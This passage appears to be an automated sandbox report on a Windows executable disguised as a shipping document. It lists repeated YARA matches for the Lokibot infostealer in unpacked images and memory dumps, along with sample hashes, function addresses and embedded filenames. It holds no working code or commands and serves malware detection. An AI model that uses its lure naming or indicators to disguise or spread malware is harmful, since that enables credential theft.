Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 5516, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 6536, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_055A1CC4	0_2_055A1CC4
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_055A01A0	0_2_055A01A0
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_055A0B50	0_2_055A0B50
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_055A0B60	0_2_055A0B60
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_055A2B11	0_2_055A2B11
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_055A1CB8	0_2_055A1CB8
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_05681808	0_2_05681808
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_056817F8	0_2_056817F8
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_07C89C88	0_2_07C89C88
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_07C80180	0_2_07C80180
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_07C85620	0_2_07C85620
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_07C83578	0_2_07C83578
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_07C82CF8	0_2_07C82CF8
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_07C84C20	0_2_07C84C20
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_07C88AF8	0_2_07C88AF8
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_07C83140	0_2_07C83140
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_07C99BC0	0_2_07C99BC0
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_07C97A20	0_2_07C97A20
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_07C9C900	0_2_07C9C900
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_07C98D10	0_2_07C98D10
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_07C9CC18	0_2_07C9CC18
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_07C98770	0_2_07C98770
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_07C96F10	0_2_07C96F10
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_07C9BED0	0_2_07C9BED0
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_07C982A8	0_2_07C982A8
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_07C9AA60	0_2_07C9AA60
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_07C9F148	0_2_07C9F148
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_07C9B918	0_2_07C9B918
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_07C9BC88	0_2_07C9BC88
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_07C9D8A8	0_2_07C9D8A8
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_07C90040	0_2_07C90040
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_07C90006	0_2_07C90006
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 3_2_0040549C	3_2_0040549C
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 3_2_004029D4	3_2_004029D4

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: String function: 00405B6F appears 42 times

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5516 -s 1376

Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Static PE information: invalid certificate

Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1738264529.0000000007AA7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000000.1619166037.0000000000D1C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameUHN.exeX vs Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1739039573.0000000007FB0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1735740544.0000000004C67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1733889644.000000000131E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Binary or memory string: OriginalFilenameUHN.exeX vs Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
